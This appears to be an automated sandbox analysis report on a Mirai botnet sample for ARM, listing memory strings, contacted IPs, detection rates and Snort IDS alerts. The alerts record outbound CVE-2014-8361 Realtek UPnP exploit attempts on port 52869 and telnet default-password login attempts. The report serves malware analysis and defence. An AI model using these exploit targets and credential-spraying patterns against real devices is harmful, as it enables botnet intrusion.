Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd-agent-1
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/Hilix.armSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Hilix.arm
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: !/usr/bin/qemu-arm!/proc/5285/fd/11
Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information:

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.104.67.34	unknown	Egypt	37069	MOBINILEG	false
185.119.218.5	unknown	Czech Republic	198167	APPTOCLOUDAppToCloudserversvpsCZ	false
91.52.65.178	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
45.128.22.52	unknown	Denmark	201290	BLACKGATENL	false
219.56.220.39	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
156.49.160.17	unknown	Sweden	29975	VODACOM-ZA	false
17.30.215.164	unknown	United States	714	APPLE-ENGINEERINGUS	false
156.254.70.171	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
38.206.46.24	unknown	United States	9009	M247GB	false
91.19.165.50	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
91.75.212.117	unknown	United Arab Emirates	15802	DU-AS1AE	false
91.120.152.33	unknown	Hungary	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
90.70.5.162	unknown	France	3215	FranceTelecom-OrangeFR	false
141.150.163.18	unknown	United States	701	UUNETUS	false
95.156.176.206	unknown	Bosnia and Herzegowina	20875	HPTNET-ASBA	false
185.106.143.34	unknown	Serbia	7979	SERVERS-COMUS	false
38.181.75.64	unknown	United States	174	COGENT-174US	false
91.30.56.29	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
91.54.122.242	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
45.206.28.0	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
59.1.188.143	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
77.110.64.247	unknown	Lebanon	34610	RIKSNETSE	false
45.9.143.74	unknown	Russian Federation	209038	ALEXGEINERMSKRU	false
45.18.215.62	unknown	United States	7018	ATT-INTERNET4US	false
185.75.12.212	unknown	Spain	201942	SOLTIAES	false
91.74.73.94	unknown	United Arab Emirates	15802	DU-AS1AE	false
185.38.220.169	unknown	Poland	56523	AMELEKTRONIKPL	false
185.23.188.242	unknown	France	60532	RENTACLOUDFR	false
45.63.53.230	unknown	United States	20473	AS-CHOOPAUS	false
45.237.157.87	unknown	Brazil	268286	TECHPIGNATONTELECOMBR	false
185.35.202.71	unknown	Norway	50304	BLIXNO	false
185.169.213.42	unknown	Germany	13012	GENIAS-ASDE	false
79.103.170.140	unknown	Greece	1241	FORTHNET-GRForthnetEU	false
176.196.62.156	unknown	Russian Federation	39927	ELIGHT-ASRU	false
194.28.179.238	unknown	Ukraine	197073	KUZNETSOVSK-ASUA	false
45.185.140.128	unknown	Brazil	269378	INFINITETELECOMBR	false
185.149.161.42	unknown	Russian Federation	61131	ZONATELECOM-ASRU	false
142.166.65.28	unknown	Canada	855	CANET-ASN-4CA	false
189.172.103.25	unknown	Mexico	8151	UninetSAdeCVMX	false
59.27.2.25	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
45.50.54.63	unknown	United States	20001	TWC-20001-PACWESTUS	false
185.19.109.133	unknown	United Kingdom	17804	LAODC-AS-APLaoDataCenterLA	false
190.94.7.150	unknown	Dominican Republic	12066	ALTICEDOMINICANASADO	false
41.239.218.36	unknown	Egypt	8452	TE-ASTE-ASEG	false
89.67.99.56	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
45.199.228.211	unknown	Seychelles	8100	ASN-QUADRANET-GLOBALUS	false
45.126.216.220	unknown	Hong Kong	23470	RELIABLESITEUS	false
99.56.5.185	unknown	United States	7018	ATT-INTERNET4US	false
197.164.175.168	unknown	Egypt	24863	LINKdotNET-ASEG	false
45.9.143.98	unknown	Russian Federation	209038	ALEXGEINERMSKRU	false
45.52.96.195	unknown	United States	5650	FRONTIER-FRTRUS	false
185.124.199.108	unknown	Germany	3337	KOMATSUDE	false
41.17.0.118	unknown	South Africa	29975	VODACOM-ZA	false
173.70.19.34	unknown	United States	701	UUNETUS	false
185.15.150.55	unknown	Spain	199930	WIFIBALEARES-ASCSabaters13ES	false
45.55.195.228	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
185.187.222.120	unknown	Italy	31543	MYNET-ASmyNETgmbhAT	false
154.82.151.120	unknown	Seychelles	32708	ROOTNETWORKSUS	false
17.112.167.99	unknown	United States	714	APPLE-ENGINEERINGUS	false
2.41.35.61	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
91.13.61.237	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
194.253.157.141	unknown	European Union	1759	TSF-IP-CORETeliaFinlandOyjEU	false
113.51.241.67	unknown	China	17506	UCOMARTERIANetworksCorporationJP	false
173.184.189.173	unknown	United States	7029	WINDSTREAMUS	false
185.192.230.56	unknown	United Kingdom	5503	RMIFLGB	false
156.158.248.174	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
41.45.223.165	unknown	Egypt	8452	TE-ASTE-ASEG	false
36.118.160.38	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
41.17.127.1	unknown	South Africa	29975	VODACOM-ZA	false
5.218.125.60	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
45.145.30.193	unknown	Turkey	197328	INETLTDTR	false
90.255.143.236	unknown	United Kingdom	5378	VodafoneGB	false
45.1.177.234	unknown	United States	7377	UCSDUS	false
53.82.186.160	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
143.10.148.65	unknown	United States	11003	PANDGUS	false
59.218.207.68	unknown	China	2516	KDDIKDDICORPORATIONJP	false
222.202.165.36	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
91.90.138.39	unknown	Israel	25046	CHECKPOINTIL	false
197.173.155.25	unknown	South Africa	37168	CELL-CZA	false
68.97.175.155	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
37.155.189.38	unknown	Turkey	20978	TT_MOBILIstanbulTR	false
45.197.137.128	unknown	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	false
96.151.55.151	unknown	United States	7922	COMCAST-7922US	false
91.74.182.121	unknown	United Arab Emirates	15802	DU-AS1AE	false
91.60.221.230	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
91.235.70.182	unknown	Ukraine	33817	TELEGROUPUA-ASUA	false
91.5.97.3	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
57.159.196.85	unknown	Belgium	2686	ATGS-MMD-ASUS	false
45.18.240.22	unknown	United States	7018	ATT-INTERNET4US	false
41.77.181.171	unknown	Algeria	36974	AFNET-ASCI	false
45.122.192.3	unknown	China	63535	FFANChengduWandaElectronicInformationTechnologyCoLtd	false
91.67.33.158	unknown	Germany	31334	KABELDEUTSCHLAND-ASDE	false
179.77.43.231	unknown	Brazil	26615	TIMSABR	false
173.12.201.233	unknown	United States	7922	COMCAST-7922US	false
45.130.62.123	unknown	Israel	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
185.21.99.54	unknown	Austria	49808	POWERSPEED-ASAT	false
185.70.118.221	unknown	Italy	204482	EPICLINK-ASIT	false
41.80.99.57	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
45.242.108.39	unknown	Egypt	24863	LINKdotNET-ASEG	false
91.18.128.111	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:52869/picdesc.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://127.0.0.1:52869/wanipcn.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: Hilix.arm	Virustotal: Detection: 53%			Perma Link
Source: Hilix.arm	ReversingLabs: Detection: 63%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42190 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42190 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42192 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42938 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42938 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42940 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52534 -> 45.195.65.222:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52534 -> 45.195.65.222:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41374 -> 45.115.242.71:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41374 -> 45.115.242.71:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37956 -> 45.120.78.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37956 -> 45.120.78.8:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37998 -> 45.33.253.20:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37998 -> 45.33.253.20:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41988 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41988 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42370 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42370 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42376 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43734 -> 45.126.231.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43734 -> 45.126.231.52:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42000 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53188 -> 45.115.241.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42808 -> 45.120.204.46:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42808 -> 45.120.204.46:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49774 -> 45.126.231.173:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49774 -> 45.126.231.173:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38276 -> 45.195.11.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38276 -> 45.195.11.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41826 -> 45.42.86.119:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41826 -> 45.42.86.119:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35304
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35304
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46844 -> 45.195.8.141:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46844 -> 45.195.8.141:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:57880
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:57880
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:32954 -> 64.85.48.118:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59500 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59500 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59502 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52730
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49498 -> 45.33.251.25:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49498 -> 45.33.251.25:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:57454
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:57454
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60606 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60606 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60624 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50314 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50314 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50318 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44216 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44216 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44220 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48390 -> 185.182.49.106:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48390 -> 185.182.49.106:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51856 -> 45.33.249.12:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51856 -> 45.33.249.12:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52826
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35174 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35174 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35180 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37322 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37322 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37324 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42786 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42786 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42792 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52880
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53568 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53568 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53570 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:53340 -> 80.229.103.151:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:53340 -> 80.229.103.151:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60964 -> 45.115.237.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60964 -> 45.115.237.198:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35526
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35526
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49632 -> 45.113.3.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49632 -> 45.113.3.178:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58144
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58144
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52998
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46480 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46480 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34652 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34652 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46486 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34656 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41238 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41238 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41248 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37898 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37898 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37900 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33250
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33250
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50282 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50282 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50288 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36600 -> 45.117.146.14:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36600 -> 45.117.146.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37908 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37908 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37916 -> 45.177.209.66:52869
